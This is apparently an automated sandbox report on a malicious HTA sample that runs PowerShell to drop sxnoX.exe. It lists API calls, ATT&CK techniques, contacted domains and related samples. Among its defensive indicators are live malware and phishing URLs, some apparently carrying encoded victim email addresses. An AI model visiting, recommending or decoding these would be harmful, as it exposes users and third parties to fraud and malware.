Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: EnumSystemLocalesW,	4_2_00218BD1
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_00218C6C
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: GetLocaleInfoW,	4_2_00212E77
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: EnumSystemLocalesW,	4_2_00218EBF
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: GetLocaleInfoW,	4_2_00218F1E
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: EnumSystemLocalesW,	4_2_00218FF3
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: GetLocaleInfoW,	4_2_0021903E
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_002190E5
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: GetLocaleInfoW,	4_2_002191EB
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: EnumSystemLocalesW,	4_2_002135C5
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: GetLocaleInfoA,DefWindowProcW,	4_2_00161B3F

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Code function: 4_2_001EE7A0 cpuid

4_2_001EE7A0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_0820943C CreateNamedPipeW,

3_2_0820943C

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Code function: 4_2_001FEACC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_001FEACC

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Code function: 4_2_002241A4 GetTimeZoneInformation,

4_2_002241A4

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Code function: 4_2_0019CDF0 GetVersionExA,GetProcAddress,

4_2_0019CDF0

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Code function: 4_2_001C7050 GetProcAddress,___from_strstr_to_strchr,GetUserNameA,GetUserNameA,

4_2_001C7050

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001964A0 socket,SetHandleInformation,_strncpy,setsockopt,inet_addr,htonl,htonl,getaddrinfo,htons,htons,bind,listen,closesocket,WSAGetLastError,closesocket,closesocket,WSAGetLastError,		4_2_001964A0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00195FB0 closesocket,socket,SetHandleInformation,setsockopt,setsockopt,setsockopt,htonl,htons,bind,WSAGetLastError,WSAGetLastError,htons,htonl,htons,connect,WSAGetLastError,		4_2_00195FB0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	Path Interception	12 Process Injection	31 Virtualization/Sandbox Evasion	11 Input Capture	2 System Time Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	12 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	12 Process Injection	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	11 Input Capture	Exfiltration Over Bluetooth	2 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	5 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Archive Collected Data	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	3 Obfuscated Files or Information	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	12 Clipboard Data	Scheduled Transfer	3 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	11 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	2 File and Directory Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	45 System Information Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
client_1.hta	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\sxnoX.exe	3%	ReversingLabs

Source	Detection	Scanner	Label
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://the.eart8f	0%	Avira URL Cloud	safe
https://the.earth.liD~	0%	Avira URL Cloud	safe
http://communicalink.com/index.phpP	0%	Avira URL Cloud	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	Avira URL Cloud	safe
http://communicalink.com/index.php	0%	Avira URL Cloud	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/	0%	Avira URL Cloud	safe
http://www.mioft.	0%	Avira URL Cloud	safe
http://communicalink.com	0%	Avira URL Cloud	safe
http://www.microsoft.c	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
the.earth.li	93.93.131.124	true	false		high
communicalink.com	172.67.177.73	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://the.earth.li/~sgtatham/putty/0.79/w32/putty.exe	false		high
http://communicalink.com/index.php	false	Avira URL Cloud: safe	unknown
https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.913678336.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	powershell.exe, 00000003.00000002.910271375.0000000004AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D06000.00000004.00000800.00020000.00000000.sdmp, sxnoX.exe.3.dr	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	sxnoX.exe.3.dr	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	powershell.exe, 00000003.00000002.910271375.0000000004AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D06000.00000004.00000800.00020000.00000000.sdmp, sxnoX.exe.3.dr	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.910271375.00000000049E6000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.910271375.00000000049E6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000003.00000002.910271375.0000000004D63000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000003.00000002.913678336.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000003.00000002.913678336.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	sxnoX.exe.3.dr	false	URL Reputation: safe	unknown
https://aka.ms/pscore6	powershell.exe, 00000003.00000002.910271375.0000000004891000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	sxnoX.exe.3.dr	false	URL Reputation: safe	unknown
https://the.eart8f	powershell.exe, 00000003.00000002.910271375.0000000004CBE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	powershell.exe, 00000003.00000002.910271375.0000000004AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D06000.00000004.00000800.00020000.00000000.sdmp, sxnoX.exe.3.dr	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.910271375.00000000049E6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	powershell.exe, 00000003.00000002.910271375.0000000004AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D06000.00000004.00000800.00020000.00000000.sdmp, sxnoX.exe.3.dr	false	URL Reputation: safe	unknown
http://the.earth.li	powershell.exe, 00000003.00000002.910271375.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.mioft.	powershell.exe, 00000003.00000002.919764732.0000000008302000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://communicalink.com	powershell.exe, 00000003.00000002.910271375.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004B8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.00000000049E6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	sxnoX.exe.3.dr	false	URL Reputation: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/	sxnoX.exe, sxnoX.exe, 00000004.00000003.907920223.0000000003251000.00000004.00000020.00020000.00000000.sdmp, sxnoX.exe, 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmp, sxnoX.exe, 00000004.00000000.906593433.0000000000227000.00000002.00000001.01000000.0000000B.sdmp, sxnoX.exe.3.dr	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	powershell.exe, 00000003.00000002.910271375.0000000004AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D06000.00000004.00000800.00020000.00000000.sdmp, sxnoX.exe.3.dr	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000003.00000002.913678336.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.913678336.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://the.earth.li	powershell.exe, 00000003.00000002.910271375.0000000004ACC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004CBE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://the.earth.liD~	powershell.exe, 00000003.00000002.910271375.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.microsoft.c	powershell.exe, 00000003.00000002.919764732.0000000008302000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.910271375.0000000004891000.00000004.00000800.00020000.00000000.sdmp	false		high
http://communicalink.com/index.phpP	powershell.exe, 00000003.00000002.910271375.00000000049E6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.177.73	communicalink.com	United States		13335	CLOUDFLARENETUS	false
93.93.131.124	the.earth.li	United Kingdom		44684	MYTHICMythicBeastsLtdGB	false

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1320444
Start date and time:	2023-10-05 18:47:05 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	client_1.hta
Detection:	MAL
Classification:	mal80.spyw.evad.winHTA@8/4@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 324 Number of non-executed functions: 60
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: client_1.hta

Simulations

Behavior and APIs

Time	Type	Description
18:47:55	API Interceptor	41x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
93.93.131.124	doc.doc	Get hash	malicious	Unknown	Browse	the.earth.li/~sgtatham/putty/latest/w64/putty.exe
93.93.131.124	lmfao.doc	Get hash	malicious	Unknown	Browse	the.earth.li/~sgtatham/putty/0.63/x86/pscp.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
communicalink.com	client_3.vbs	Get hash	malicious	Unknown	Browse	104.21.75.133
the.earth.li	client_3.vbs	Get hash	malicious	Unknown	Browse	93.93.131.124
	Informazion.vbs	Get hash	malicious	Unknown	Browse	93.93.131.124
	827837hj.xls	Get hash	malicious	Unknown	Browse	93.93.131.124
	doc.doc	Get hash	malicious	Unknown	Browse	93.93.131.124
	https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.76-installer.msi	Get hash	malicious	Unknown	Browse	93.93.131.124
	1mixELaybY.exe	Get hash	malicious	vkeylogger	Browse	93.93.131.124
	smphost.dll	Get hash	malicious	Unknown	Browse	93.93.131.124
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Unknown	Browse	93.93.131.124
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Unknown	Browse	93.93.131.124
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Unknown	Browse	93.93.131.124
	Microsoft Excel.xlsm	Get hash	malicious	Unknown	Browse	93.93.131.124
	Microsoft Excel.xlsm	Get hash	malicious	Unknown	Browse	93.93.131.124
	lmfao.doc	Get hash	malicious	Unknown	Browse	93.93.131.124
	YOeg64zDX4.exe	Get hash	malicious	AZORult	Browse	93.93.131.124
	payload.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	do7ZLDDsHX.xls	Get hash	malicious	Unknown	Browse	93.93.131.124
	m.doc	Get hash	malicious		Browse	46.43.34.31
	m.doc	Get hash	malicious		Browse	46.43.34.31
	m.doc	Get hash	malicious		Browse	46.43.34.31
	Your_Invoice_4886.doc	Get hash	malicious		Browse	46.43.34.31

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	client_3.vbs	Get hash	malicious	Unknown	Browse	104.21.75.133
	https://bodegasberamendi.com/wp-includes/fonts/?username=Y2hyaXN0Y2h1cmNoQHJ1bmFjcmVzLmNvLm56	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	http://www.auctiva.com/email/ta.aspx?uid=1972697&sid=0&eid=896379865&mid=14&aid=-1&ein=141929408795&dest=//kob6yzzyslej.lamarque.com.ar/z8lthhw/amFjb2Iuam9yZ2Vuc2VuQGdlbGl0YS5jb20=&hyhupsgz	Get hash	malicious	Unknown	Browse	104.17.2.184
	Setup_win64_5.49.1031-release.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.208.220
	https://selligenttier.naylorcampaigns.com/track?type=click&enid=ZWFzPTEmbXNpZD0mYXVpZD0mbWFpbGluZ2lkPTYyNDExMiZtZXNzYWdlaWQ9NjI0MTEyJmRhdGFiYXNlaWQ9NjI0MTEyJnNlcmlhbD0xNjgyODQwNyZlbWFpbGlkPVRpbUBFbGV2YXRlZGNnLmNvbSZ1c2VyaWQ9MjExMTg2JnRhcmdldGlkPSZtbj0mZmw9Jm12aWQ9JmV4dHJhPSYmJg==&&&9999&&&https://carsinsu.com/BCdsW3/tz3nhx/amRwZWFjb2NrQGNsZXJrb2Zjb3VydHMuY2M=	Get hash	malicious	Unknown	Browse	104.21.19.75
	https://v2lutrcswlttuy.z1.web.core.windows.net/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	z3recAeWcY.exe	Get hash	malicious	Ursnif, Strela Stealer	Browse	172.67.181.91
	file.exe	Get hash	malicious	FormBook	Browse	172.67.132.228
	https://clicksmail.medscape.org/e-t-p?clientId=7000929&sendId=5475311&subscriberId=MjUxNDM2MzM=&istId=istId&eventDate=2023-05-2923:00:39&eventType=article_link_click&sendUrlId=sendUrlId&urlId=urlId&alias=alias&batchId=batchId&triggeredSendExternalKey=ese-prod-5008584-perform-key&url=http%3A%2F%2Fmyubow.fvvrj.laim.mn%2FdGF4ZGVlZHNAb2thbG9vc2FjbGVyay5jb20=	Get hash	malicious	HTMLPhisher	Browse	104.17.3.184
	https://u7917333.ct.sendgrid.net/ls/click?upn=YGB-2BZSImvMUGBgb4XYQSXYLKsvJ4QrsHJDIpENLKxXM2JkolcDzj0CHJvdpeplaxsH99cbqkLAs-2Fcf8RmBjy8G5ZP2mu44gQwBXyOjj-2FP0Zctu-2FtTHRHV9VQheGPdu5EMZfz_BJOfvCRRlqISoLxrJliZI9RaHwsjwocnxbjDAl1bbrp1M3X1cKxHQbp9dov10OEZ2a4Ms2BVGwIQbV7pc2Gl3moyiRhdoXD9Y95V9ZK1IpM-2Fd0RTjZoAqbP-2FZ1vWM7yydGHSUntKEdeZbgUpw83BD8B6nbEnGL0iVtoXbrHh9xdzCPppuG73fyokP3YYZA5oKG6h3-2BD9LbjVPIZpGPRQyD6A-2Fpp9HyEYUQmu19RP1k4-3D	Get hash	malicious	Unknown	Browse	104.17.2.184
	https://pub-293ee7fa42274247834c50067ffbc67f.r2.dev/30zuth09clo23me.html#fcarron@amada.fr	Get hash	malicious	HTMLPhisher	Browse	104.18.3.35
	https://bing.com/ck/a?!&&p=2f55faedf6fc1518JmltdHM9MTY5NjIwNDgwMCZpZ3VpZD0xZTQzNThiOS1jYzA3LTY2MmEtMjQyNi00YjI5Y2QwZTY3MDgmaW5zaWQ9NTAwMw&HfTHbabxBD&ptn=3&dVsGhAkyII&hsh=3&fclid=1e4358b9-cc07-662a-2426-4b29cd0e6708&piGoKtkRRz&u=a1aHR0cHM6Ly9tYXJjdnQub3JnLw#&&yygpKSi20tdPtyhKL0uzLMyuyklOK6hMz880LNcrLDe3TEky1ysq1U8yryrXBwA=?salesbenelux@carboline.com%20https://bing.com/ck/a?!&&p=2f55faedf6fc1518JmltdHM9MTY5NjIwNDgwMCZpZ3VpZD0xZTQzNThiOS1jYzA3LTY2MmEtMjQyNi00YjI5Y2QwZTY3MDgmaW5zaWQ9NTAwMw&HfTHbabxBD&ptn=3&dVsGhAkyII&hsh=3&fclid=1e4358b9-cc07-662a-2426-4b29cd0e6708&piGoKtkRRz&u=a1aHR0cHM6Ly9tYXJjdnQub3JnLw#&&yygpKSi20tdPtyhKL0uzLMyuyklOK6hMz880LNcrLDe3TEky1ysq1U8yryrXBwA=?salesbenelux@carboline.com	Get hash	malicious	Unknown	Browse	104.17.3.184
	https://outlooksicherheit.softr.app/	Get hash	malicious	Unknown	Browse	104.18.231.83
	file.exe	Get hash	malicious	RedLine	Browse	162.159.135.233
	Cci Scanned DOCS 8802.html	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	file.exe	Get hash	malicious	SmokeLoader	Browse	172.67.171.76
	https://u7917333.ct.sendgrid.net/ls/click?upn=YGB-2BZSImvMUGBgb4XYQSXRIg5Vn2hdGLwxA4-2Fd0NfaBwny9cGSC5GKj9ctJizos9nE-2BFigzwD40nqhW0oor2jnHevxlN5PWY3EFVUSdggPzLzOJ-2BEuu6us3N4Pl6hoapE5Vb_jrUqf5zwH7FzSx1F7hMR78V6ree-2Bd2G5UL9WgcJWbM0zbZQbEvFD7BN0qxBcscVf6NIhb7D-2FiatQpAihmM3nJSD-2BRivZ1J5tpB9sy4so6YrbKtlwE3j6oxq5NIXRdWUTAFvdPYJMIXR8gK5BfOakQ-2BBCjzSGjtPMS6nUA98fY9qr01yxhDyMoO9a-2FR6bW9UfHWXgLQjYkR7X9SJ-2By1Poi2AhlGXKhh3OmXrLjOh3n7qkwmduoGzqtSvj7bnfJPZw	Get hash	malicious	Unknown	Browse	104.17.2.184
	Trade Confirmation & Authorization Request #10042023.shtml	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	SmokeLoader	Browse	172.67.181.144
	Ach_Payment.html	Get hash	malicious	Unknown	Browse	104.17.2.184
MYTHICMythicBeastsLtdGB	client_3.vbs	Get hash	malicious	Unknown	Browse	93.93.131.124
	Informazion.vbs	Get hash	malicious	Unknown	Browse	93.93.131.124
	827837hj.xls	Get hash	malicious	Unknown	Browse	93.93.131.124
	7XlWWSA2LU.dll	Get hash	malicious	Wannacry	Browse	93.93.132.33
	section_228_highways_agreement 34377.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	dfas_telework_agreement 20731.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	private_child_support_agreement_template 17845.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	making_a_contract_legally_binding_30040.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	illegalargumentexception_comparison_method_violates_its_general_contra 70051.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	electrical_contractor_agreement_template 5445.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	gootloader_stage1.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	difference_between_service_contract_and_employment_contract 98116.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	print_scheduling_agreement_sap 4874.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	chase_heloc_subordination_form 86327.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	doc.doc	Get hash	malicious	Unknown	Browse	93.93.131.124
	https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.76-installer.msi	Get hash	malicious	Unknown	Browse	93.93.131.124
	1mixELaybY.exe	Get hash	malicious	vkeylogger	Browse	93.93.131.124
	smphost.dll	Get hash	malicious	Unknown	Browse	93.93.131.124
	arm7	Get hash	malicious	Mirai Moobot	Browse	46.235.224.242
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Unknown	Browse	93.93.131.124

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	client_3.vbs	Get hash	malicious	Unknown	Browse	93.93.131.124
	oMGTwbRGSf.exe	Get hash	malicious	Gurcu Stealer	Browse	93.93.131.124
	Remittance-Copy.scr.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	file.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	file.exe	Get hash	malicious	RedLine	Browse	93.93.131.124
	SHIPPING_DOCUMENTS.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	SHIPPING_DOCUMENTS.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	legend.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	castrrrrrrrrrrrrrrrFile.vbs	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	Tender_ENQ.NO_6-59512.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	93.93.131.124
	Bfgjjenmr.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	Bfgjjenmr.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	LPO.pdf.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	CjIkKhjdXj.exe	Get hash	malicious	AgentTesla, zgRAT	Browse	93.93.131.124
	PO#SWASA2200157.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	93.93.131.124
	BE2039392-TT.vbs	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	IMG_Requestfdp.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	Presupuesto+Pago_realizados_03-09-2023.Pdf.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	16965013835371bade819b828d2ef6e24480e6d349f5b28ef4ea2aba6ea0633ce7f5b34953602.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	2023_Customer_Information_Export(1).docx.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\sxnoX.exe	client_3.vbs	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	17752
Entropy (8bit):	5.620854140682859
Encrypted:	false
SSDEEP:	384:ZRC+2ApJwj7E3R0zKjMdmcuz5vIlLpXc/djdAENIRUZT6a2cv4n0HNAanQWI68DV:aApuKR0zKKQzGlLpXcFiBRUJV2c0sHns
MD5:	2BA7B3A5457575103EA8EB992E65831F
SHA1:	E79F92BAA0FA5D44609D5A3451E88747A4A012C7
SHA-256:	64BECD7F23913DAA9BB92B6E7C9C942E5F9FBBF3126262B4618CB2BF11A8E1A8
SHA-512:	2BA1D562A7580350F59D3A301B6A057594F2F65DF1E7863C51B62822D77CDF0A14944CC89B74E027B3AFD0401170842EDF5BE927FCDC2790319DAC5609852564
Malicious:	false
Reputation:	low
